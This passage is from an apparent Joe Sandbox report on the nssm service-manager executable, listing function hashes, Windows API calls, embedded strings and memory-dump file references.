                                                                                                                                                                                                                                  • Opcode ID: 2982dcf3acac070a28ea9ba4a45404df5097b05b0f363d0960d109575382c79c
                                                                                                                                                                                                                                  • Instruction ID: 5af73b0cc7afdd40427a5131669e5a2e9fc5998fefdb67bea768e046abb423b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2982dcf3acac070a28ea9ba4a45404df5097b05b0f363d0960d109575382c79c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92016D32225A0482EB42CF26F88039573A0F74DBE0F546A29BF5A477B4DA3CCD858300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Item$EnableWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1115945535-0
                                                                                                                                                                                                                                  • Opcode ID: c35094a6c6514124ee4c42315b8d23f58895cd49ddc28df6356db632b1f60cb4
                                                                                                                                                                                                                                  • Instruction ID: 43e84243bd221ec688928e7edff4dbcbba1a330ad0e9f9e0c4108ab8f8e2073d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c35094a6c6514124ee4c42315b8d23f58895cd49ddc28df6356db632b1f60cb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F0AC76B41A1093E716AB93E8983952261B7CDBE1F60442DEF4A43374CD3C8C4AC210
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CodeEnumExitTerminateWindows
                                                                                                                                                                                                                                  • String ID: kill_process
                                                                                                                                                                                                                                  • API String ID: 3736881346-4017559064
                                                                                                                                                                                                                                  • Opcode ID: a1cffeb3f4f15fc92d7e9ed754726cc88eb2bce324a55764159dddfeef278a8f
                                                                                                                                                                                                                                  • Instruction ID: a2f157d7488f0f618978a860c1cd9b8b4cfe2a0f23b69f8f3f5ea115c5ae24ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1cffeb3f4f15fc92d7e9ed754726cc88eb2bce324a55764159dddfeef278a8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 393172B160478582FB66CB17B4043E977A1FB487C8F48412ABF49476B9DB7CCA45C721
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeregisterErrorLastQueryRegisterReportValue_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                  • API String ID: 2461937359-685833217
                                                                                                                                                                                                                                  • Opcode ID: d96a8c252647bc5ef88956492ac84b1adeeebeddb6c051979445ccd481accdef
                                                                                                                                                                                                                                  • Instruction ID: a3731558761a4c7dc196fa6752279335c56787ff58bca2e57d20485d0aafa0cf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d96a8c252647bc5ef88956492ac84b1adeeebeddb6c051979445ccd481accdef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC215AB261478086E761DB52F49479AB7A0F38CBE8F505225BB9E47BE9CB3CC545CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeregisterRegisterReport
                                                                                                                                                                                                                                  • String ID: nssm
                                                                                                                                                                                                                                  • API String ID: 3235303502-2602286837
                                                                                                                                                                                                                                  • Opcode ID: 54d2b58038b24e689c20a1b5269bb759030fd5953b7b6857e48e09f9004a4415
                                                                                                                                                                                                                                  • Instruction ID: c5e76ea28fd0135feb3399e0106bf09341afc02ef4b726f62364ee8b001814cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d2b58038b24e689c20a1b5269bb759030fd5953b7b6857e48e09f9004a4415
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E111E7B2605B8092DB62CB45B440B99B3A4FB987D8F504629EBAD03BE5DB3CC054C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _snwprintf_s.LIBCMT ref: 000000014000AFB0
                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000014000EF8D), ref: 000000014000AFE8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: RegisterEventSourceW.ADVAPI32 ref: 0000000140007183
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: ReportEventW.ADVAPI32 ref: 00000001400071F8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: DeregisterEventSource.ADVAPI32 ref: 0000000140007201
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeleteDeregisterRegisterReportValue_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %s%s$delete_createfile_parameter()
                                                                                                                                                                                                                                  • API String ID: 1919654809-3045456684
                                                                                                                                                                                                                                  • Opcode ID: 66d2f542858237f3b3b9184a515f6c4d7b1a74dd826c8ef12da2a602ebea01ee
                                                                                                                                                                                                                                  • Instruction ID: f4acc77013aa544a5509a587411dbfc0eff3d3aded772524498c3b4b429569cf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66d2f542858237f3b3b9184a515f6c4d7b1a74dd826c8ef12da2a602ebea01ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6801617120478542E651CB66F8517DA62A0F74D7E4F500229BB9D876E5CF3CC515C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 000000014000C588
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007220: _vfwprintf_p.LIBCMT ref: 0000000140007251
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007220: LocalFree.KERNELBASE(?,?,?,00000000,0000000140001065), ref: 0000000140007259
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleFreeLocalWindow_vfwprintf_p
                                                                                                                                                                                                                                  • String ID: 2.24$2014-08-31$64-bit
                                                                                                                                                                                                                                  • API String ID: 3822594611-1406443146
                                                                                                                                                                                                                                  • Opcode ID: 4910f63de7b9be5233629a53f62a4569fabba77b9d7076b31808219af60fcfad
                                                                                                                                                                                                                                  • Instruction ID: 9ea9593ba4db156e4c4732d1c396be9cc0238bddd5eec131542e773d5a35f2c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4910f63de7b9be5233629a53f62a4569fabba77b9d7076b31808219af60fcfad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F03C71610A45A2FB52DBA2B8407E56364A78C394FC4093EBB5D476B1CA3CCA9EC710
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,000000FF,00000001400180B5,?,?,00000028,000000014001DA5D,?,?,00000000,0000000140018CC8,?,?,00000000,0000000140019259), ref: 000000014001807B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,000000FF,00000001400180B5,?,?,00000028,000000014001DA5D,?,?,00000000,0000000140018CC8,?,?,00000000,0000000140019259), ref: 0000000140018090
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-1276376045
                                                                                                                                                                                                                                  • Opcode ID: a829c9d53270e0bb6d812bfdf6353c17cd7c5479c175dd73fca38250c0af6048
                                                                                                                                                                                                                                  • Instruction ID: b7ee655d9ff3d132e88ab47664f4dea6593dfe3a4ddb3c2361e5fbecfc60e533
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a829c9d53270e0bb6d812bfdf6353c17cd7c5479c175dd73fca38250c0af6048
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8E0EC30B02B0452EF5B9BA2A8943A413905B4CB80F48142C9A1E0B3B2EE3C8AD98300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                  • String ID: get_service_username()$username
                                                                                                                                                                                                                                  • API String ID: 1617791916-1118073074
                                                                                                                                                                                                                                  • Opcode ID: 8fa110f7dd6038afbea5ae3993e39128d1dc3bddb45eb729c5d03756e5535196
                                                                                                                                                                                                                                  • Instruction ID: 1c7bed8f0e3aa2f20da56b8b97b41e670a914f70dcecbc787967485778d2f89b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fa110f7dd6038afbea5ae3993e39128d1dc3bddb45eb729c5d03756e5535196
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A219A32205B5081EB52EB66B4017C963A0FB4DBD8F145129FFAD4BBAADF3AC4918700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                  • String ID: copy_environment_block()$environment
                                                                                                                                                                                                                                  • API String ID: 1617791916-2686971372
                                                                                                                                                                                                                                  • Opcode ID: c72d42c82b0434265d1a56cf898e8f5437819a191ab942376cce0c7a57c3cc96
                                                                                                                                                                                                                                  • Instruction ID: fa9a56de3bd9e49cabfc8bbd56b07caf6936dfb3553972ac21d7e4e6d6b5af8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c72d42c82b0434265d1a56cf898e8f5437819a191ab942376cce0c7a57c3cc96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43110A7571465242FB06EB76A4003FA63E2E75DBD4F044525EF89677A8EB39C4828700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CreateErrorLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2723331319-0
                                                                                                                                                                                                                                  • Opcode ID: a583d0212fd22d356d6d70e731ab25c9fb6186541f02df91ca2fd7006ebc16a9
                                                                                                                                                                                                                                  • Instruction ID: d44a036f5f5b56c5e0aad91bd774f865a4e19c27b02f186a6bef5744aa8427d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a583d0212fd22d356d6d70e731ab25c9fb6186541f02df91ca2fd7006ebc16a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9019E7170474087EB11CBABF4047AAA290EB8CBD8F544128FF9D47BA9DE7CC9814B00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer_errno_flush_freebuf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1889905870-0
                                                                                                                                                                                                                                  • Opcode ID: 8a2111739124ff611ad92540a084f58da93b79388c2ba206370bc57c35992879
                                                                                                                                                                                                                                  • Instruction ID: 04b14dbe818ba76a115c46119720fa2d2986b487240fc01441d916b79167b4b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a2111739124ff611ad92540a084f58da93b79388c2ba206370bc57c35992879
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA01D83271064142FB27AB7B94113EE71515B9D7E4F280B25BF154B6F2CA7AC8008380
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Rect$DesktopMove
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2894293738-0
                                                                                                                                                                                                                                  • Opcode ID: 585be2f6f64c2376a8433f4d87c99fcbbee2522a09ed164b03e4301e538a92ca
                                                                                                                                                                                                                                  • Instruction ID: 4eb70853062d8038e5b87d0859378873333605d69c64658465c5d0d7215d05e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 585be2f6f64c2376a8433f4d87c99fcbbee2522a09ed164b03e4301e538a92ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F01B17272950086EB15CF7AB408B597BA4F788BC1F085128FF4A83768DF3CD8048A00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                                                                                                  • Opcode ID: 6324c4b45394532d68a99cf5af29ad0d8cbca908a1ff4628883e093d6a5e3d5c
                                                                                                                                                                                                                                  • Instruction ID: 8e9f5951fff2a8fd8cf50e8ca5d3e192eb9d7b0e5220b0fb87193d1dd1053f83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6324c4b45394532d68a99cf5af29ad0d8cbca908a1ff4628883e093d6a5e3d5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E101627261464481FB1B5B6AC4913EC3651AB9EBB5F548306FB390F3F1CB7E89008611
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 0000000140011096
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 00000001400110AA
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: RegisterEventSourceW.ADVAPI32 ref: 0000000140007183
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: ReportEventW.ADVAPI32 ref: 00000001400071F8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: DeregisterEventSource.ADVAPI32 ref: 0000000140007201
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
                                                                                                                                                                                                                                  • String ID: alloc_nssm_service()$service
                                                                                                                                                                                                                                  • API String ID: 1868725766-2157636798
                                                                                                                                                                                                                                  • Opcode ID: 1a91cbcde0f8532c068b04f818cbd4c7786f222bcf16b45887aa072548f7ddd7
                                                                                                                                                                                                                                  • Instruction ID: d09a97acd0044d86c50d7e0ba99f5f85c28adf8130bbb571f029b8029ff20ed9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a91cbcde0f8532c068b04f818cbd4c7786f222bcf16b45887aa072548f7ddd7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3E09A74A10B5A92EB039F92A4007EA6350A74DBC8F840429EE8D0B370EF3CCA4A8710
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %s
                                                                                                                                                                                                                                  • API String ID: 0-620797490
                                                                                                                                                                                                                                  • Opcode ID: 7c9a38bfb38c4a0bde1899e065fe744730e651af0370e5a70527bb947d8a777f
                                                                                                                                                                                                                                  • Instruction ID: 0a63b48c611d5e0309c51c42dbfa9328182b78a91b76624e0a86b26d781d1a63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c9a38bfb38c4a0bde1899e065fe744730e651af0370e5a70527bb947d8a777f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE51A572710A4485EA63AB63B8407DA6291BB8EBD4F540525FF5A4F7F6DF39C902C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemText
                                                                                                                                                                                                                                  • String ID: remove()$service
